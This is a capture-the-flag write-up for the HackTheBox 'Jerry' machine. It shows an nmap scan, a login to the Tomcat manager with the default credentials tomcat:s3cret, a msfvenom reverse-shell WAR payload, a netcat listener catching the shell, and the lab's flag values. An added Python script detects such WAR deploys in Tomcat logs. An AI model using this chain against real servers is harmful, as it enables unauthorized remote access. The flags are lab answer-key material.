Jerry

Super Easy Windows HTB Box recommended for beginners

Reconnaissance

As usual, we start with a port scan using Nmap:

nmap -p- --open -Pn -n --min-rate 5000 -sS -sCV 10.10.10.95 -oN scan
# Nmap 7.95 scan initiated Sun Jul 27 18:12:21 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.042s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 27 18:12:59 2025 -- 1 IP address (1 host up) scanned in 38.38 seconds

We see that only one port is open on the target system: TCP 8080 (HTTP). It is running Apache Tomcat 7.0.88, and visiting the page in a browser shows the typical Tomcat dashboard.

We check the "Manager App" section, where we log in to the admin panel with the default credentials tomcat:s3cret.

We can see that we are able to upload a .WAR file, so we proceed to generate a malicious reverse shell WAR file with msfvenom:

msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=1336 -f war -o shell.war

Exploitation

We set up our listener, upload the file and access it, and we successfully get a reverse shell on our system:

rlwrap nc -lvnp 1336
Listening on 0.0.0.0 1336
Connection received on 10.10.10.95 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
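
Seen from the defender's side, the manager upload followed by a first request to the freshly deployed application leaves a recognizable sequence in the Tomcat access log. The following is an added example, not part of the original write-up, that flags that sequence; the function names are hypothetical, the log lines are constructed, and it assumes the AccessLogValve "common" pattern and that shell.war was deployed under the /shell context.

```python
import re
from ipaddress import ip_address
# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
# Manager endpoints that deploy a WAR: HTML form upload and text-interface deploy
DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy)\b')

# Constructed sample log (documentation addresses, placeholder nonce)
SAMPLE = """\
192.0.2.10 - - [27/Jul/2025:18:20:01 +0000] "GET / HTTP/1.1" 200 11398
192.0.2.10 - - [27/Jul/2025:18:20:05 +0000] "GET /manager/html HTTP/1.1" 401 2536
192.0.2.10 - tomcat [27/Jul/2025:18:20:09 +0000] "GET /manager/html HTTP/1.1" 200 19543
192.0.2.10 - tomcat [27/Jul/2025:18:21:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 21044
192.0.2.10 - - [27/Jul/2025:18:21:40 +0000] "GET /shell/ HTTP/1.1" 200 0
127.0.0.1 - deployer [27/Jul/2025:19:00:00 +0000] "PUT /manager/text/deploy?path=/app HTTP/1.1" 200 42
""".splitlines()

def is_remote(host):
    try:
        return not ip_address(host).is_loopback
    except ValueError:  # %h logged as a hostname
        return host != 'localhost'

def context_of(path):
    """First path segment = web application context ('/' for ROOT)."""
    return '/' + path.split('?', 1)[0].lstrip('/').split('/', 1)[0]

def find_remote_deploys(lines):
    """One finding per successful WAR deploy from a non-loopback client, plus the
    contexts that client reached afterwards that had never answered before."""
    seen, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        host, user, when, method, path, status = m.groups()
        ctx, ok = context_of(path), status[0] in '23'
        if ok and method in ('POST', 'PUT') and DEPLOY.match(path) and is_remote(host):
            findings.append({'client': host, 'user': user, 'time': when, 'new_contexts': []})
        elif ok and ctx not in seen:
            for f in findings:
                if f['client'] == host and ctx not in f['new_contexts']:
                    f['new_contexts'].append(ctx)
        if ok:
            seen.add(ctx)
    return findings

if __name__ == '__main__':
    print(find_remote_deploys(SAMPLE))
```

The loopback deploy in the last sample line is deliberately not reported, which matches a setup where the manager application is only reachable from the host itself.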

We also see that both flags are accessible under the C:\Users\Administrator\Desktop directory in a single file, "2 for the price of 1.txt", so we just retrieve them:

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>
